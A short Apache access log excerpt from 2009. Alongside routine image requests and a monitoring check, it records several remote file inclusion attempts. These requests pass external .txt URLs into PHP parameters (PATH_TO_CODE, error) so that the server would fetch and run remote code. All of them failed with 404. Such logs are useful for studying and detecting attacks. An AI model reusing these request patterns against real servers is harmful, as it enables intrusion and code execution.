155.212.232.66 - - [10/Jun/2009:07:11:44 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [10/Jun/2009:07:11:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [10/Jun/2009:07:11:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
155.212.232.66 - - [10/Jun/2009:07:11:46 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
89.223.3.98 - - [10/Jun/2009:07:12:06 -0400] "GET /logs/access_log.Q109052200%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:07:12:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.59.215.21 - - [10/Jun/2009:07:13:00 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
82.59.215.21 - - [10/Jun/2009:07:13:00 -0400] "GET /errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
